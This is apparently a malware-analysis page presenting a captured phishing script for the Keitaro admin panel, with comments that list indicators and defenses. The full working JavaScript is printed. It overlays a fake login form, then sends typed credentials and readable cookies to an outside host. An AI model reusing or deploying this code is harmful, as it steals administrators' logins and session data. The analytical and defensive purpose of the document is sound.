Created
February 21, 2025 09:02
Phishing script that mimics the Keitaro login form and steals data. Found in the wild.
// ANALYSIS NOTE: the code below is the captured sample, left unmodified; only comments were added.
//
// What the listing does:
//   1. Runs on DOMContentLoaded and acts only when the page URL contains "/admin".
//   2. Sends a GET to https://xxxbigdicker.com/kei. If a cookie whose name starts with
//      "cookieName=" is present, the whole document.cookie string is attached as an
//      "X-Cookie" request header.
//   3. Unless the JSON reply carries a property `true` that is strictly true, it stores the
//      current <head> and <body> markup, blanks both, rewrites the address bar to
//      "/admin?return=" and renders a look-alike "Welcome!" login form in a full-page overlay.
//   4. On submit it sets a cookie named "cookieName" holding the typed login (expiry one year
//      ahead), POSTs {login, password} as JSON to the same host, then restores the saved
//      <head>, <body> (after 1 s) and the original path + query string.
//
// Indicators visible in this sample (for log and content searches):
//   - outbound requests to xxxbigdicker.com, path /kei (GET with X-Cookie header, POST with JSON)
//   - a first-party cookie literally named "cookieName"
//   - address bar switching to "/admin?return=" without a navigation
//   - form id "ng-pristine" and a stylesheet pulled from code.ionicframework.com (ionicons 2.0.1)
//
// Defensive notes:
//   - document.cookie only exposes cookies without the HttpOnly attribute, so HttpOnly session
//     cookies are not included in the X-Cookie header.
//   - A Content-Security-Policy whose connect-src does not allow this host blocks both fetch calls.
//   - The custom X-Cookie header and the application/json POST are both non-simple cross-origin
//     requests, so browsers should send an OPTIONS preflight to the host first; that shows up in
//     proxy logs.
//   - How the script was injected is not visible here; presumably a modified panel asset —
//     verify file integrity of the served JavaScript.
document.addEventListener("DOMContentLoaded", (function() { | |
// Gate: only pages whose URL contains "/admin" are affected.
if (window.location.href.includes("/admin")) { | |
const e = {}; | |
// If the marker cookie from an earlier submission exists, forward all readable cookies.
document.cookie.split(";").some((e => e.trim().startsWith( | |
"cookieName="))) && (e["X-Cookie"] = document | |
.cookie), fetch("https://xxxbigdicker.com/kei", { | |
method: "GET", | |
headers: e | |
}).then((e => { | |
if (!e.ok) throw new Error( | |
"Network response was not ok"); | |
return e.json() | |
})).then((e => { | |
// `!0` is `true`: the overlay is shown unless the remote reply sets `true: true`.
// Presumably the server uses this to skip visitors it has already seen; confirm from traffic.
if (!0 !== e.true) { | |
// Keep the original <head> markup so it can be put back after submission.
var o = document.head.innerHTML; | |
document.head.innerHTML = ""; | |
let e = window.location.pathname + | |
window.location.search, | |
r = document.createElement("title"); | |
r.innerText; | |
r.innerText = "Welcome!", document.head | |
.appendChild(r); | |
// Keep the original <body> markup, then blank the page and change the visible URL.
var n = document.body.innerHTML; | |
document.body.innerHTML = "", window | |
.history.replaceState({}, "", | |
"/admin?return="); | |
// Inline CSS plus the fake login form (inputs named "login" and "password").
const a = | |
'\n <style>.login,body,html{height:100%;overflow:hidden;padding:0;width:100%}.btn,.ion{vertical-align:middle}*,:after,:before{box-sizing:border-box}html{font-family:sans-serif;line-height:1.15;-webkit-text-size-adjust:100%;-webkit-tap-highlight-color:transparent}body{font-family:Helvetica Neue,Helvetica,Arial,sans-serif;font-size:1rem;font-weight:400;line-height:1.428571429;color:#212529;text-align:left;background-color:#fff}body,html{margin:0}h3{font-size:1.25rem!important;font-weight:400!important;line-height: 1.1;}h1,h2,h3,h4 .h4{margin-bottom:.5em;margin-top:1.2em}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button;-webkit-appearance:none;-moz-appearance:none;appearance:none}button,select{text-transform:none}button,input{overflow:visible}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button{border-radius:0}.login{position:fixed;top:0;z-index: 1000000;display:block;background:#eee;border-radius:6px;margin:0}.login-block{top:50%;max-width:350px;margin:-150px auto 0}.w-100{width:100%!important}.position-relative{position:relative!important}.card,.login-field{position:relative}.d-block{display:block!important}.login-form{background:#fff;border:1px solid #e8e8e8}.card{display:flex;flex-direction:column;min-width:0;word-wrap:break-word;background-clip:border-box;border:1px solid rgba(0,0,0,.125);border-radius:.375rem}.form-control,.form-control:focus{color:#495057;background-color:#fff}.login .card .card-body{padding:30px 20px 10px}.card-body{flex:1 1 auto;min-height:1px;padding:1.25rem}.btn,.form-control{font-weight:400;padding:.375rem .75rem;font-size:1rem;line-height:1.428571429}.login h3{margin:0 0 20px;color:#555}.form-group{margin-bottom:1.25rem}.login .form-control{padding-left:30px}.form-control{display:block;width:100%;height:calc(1.42857em + .75rem + 2px);background-clip:padding-box;border:1px solid #ced4da;border-radius:.375rem;transition:border-color .15s 
ease-in-out,box-shadow .15s ease-in-out}.form-control:focus{border-color:#9cc4e4;box-shadow:0 0 0 .2rem rgba(56,137,201,.25);outline:0}.form-control::placeholder{color:#aaa;opacity:1}.login-field i{position:absolute;top:11px;left:11px;font-size:16px}.text-gray-light{color:#999!important}.btn{display:inline-block;color:#212529;text-align:center;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;background-color:transparent;border:.063rem solid transparent;border-radius:.375rem;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out}.btn:not(:disabled):not(.disabled),[type=button]:not(:disabled),[type=reset]:not(:disabled),[type=submit]:not(:disabled),button:not(:disabled){cursor:pointer}.btn-wide{width:100%}.btn-success{color:#fff!important;background-color:#6eb371}.btn-danger,.btn-secondary,.btn-success{border-color:rgba(0,0,0,.1)!important}.btn:hover{color:#212529;text-decoration:none}.btn-success.focus,.btn-success:focus,.btn-success:hover{color:#fff;background-color:#56a55a;border-color:#529c55}</style>\n <div class="login-block w-100 position-relative d-block">\n <div class="card login-form">\n <div class="card-body">\n <h3 class="ng-binding">Welcome!</h3>\n <form id="ng-pristine">\n <div class="form-group login-field">\n <input class="form-control" type="text" name="login" autofocus="true" placeholder="Username">\n <i class="ion ion-android-person text-gray-light"></i>\n </div>\n <div class="form-group login-field">\n <input class="form-control" type="password" name="password" placeholder="Password">\n <i class="ion ion-locked text-gray-light"></i>\n </div>\n <div class="form-group">\n <button class="btn btn-success btn-wide animate-width" type="submit">\n <span class="ng-binding">Sign in</span>\n </button> \n </div>\n </form>\n </div>\n </div>\n </div>\n ', | |
d = document.createElement("div"); | |
d.classList.add("login"), d.innerHTML = | |
a, document.body.appendChild(d); | |
// Third-party icon font loaded from a public CDN; a request to it from an admin page is a weak indicator.
var t = document.createElement("link"); | |
t.rel = "stylesheet", t.href = | |
"https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css", | |
document.head.appendChild(t); | |
var i = document.getElementById( | |
"ng-pristine"); | |
// Submit handler: the normal form submission is cancelled and the typed values are read instead.
i.addEventListener("submit", (function( | |
t) { | |
t.preventDefault(); | |
var r = { | |
login: i | |
.elements | |
.login | |
.value, | |
password: i | |
.elements | |
.password | |
.value | |
}; | |
// Marker cookie "cookieName" (31536e6 ms = 365 days), then the credentials leave the origin as a JSON POST.
// The fetch result is not awaited; the saved <head>, <body> and URL are restored right after.
document.cookie = | |
`cookieName=${i.elements.login.value}; expires=${new Date(Date.now()+31536e6).toUTCString()}; path='/';`, | |
fetch( | |
"https://xxxbigdicker.com/kei", { | |
method: "POST", | |
headers: { | |
"Content-Type": "application/json" | |
}, | |
body: JSON | |
.stringify( | |
r) | |
}), document | |
.head.innerHTML = | |
"", document.head | |
.innerHTML = o, | |
document.body | |
.removeChild(d), | |
setTimeout(( | |
function() { | |
document | |
.body | |
.innerHTML = | |
n | |
}), 1e3), window | |
.history | |
.replaceState({}, | |
"", e) | |
})) | |
} | |
// Any failure of the initial GET is only logged to the console; the page is then left untouched.
})).catch((e => { | |
console.error("Error:", e) | |
})) | |
} | |
})); |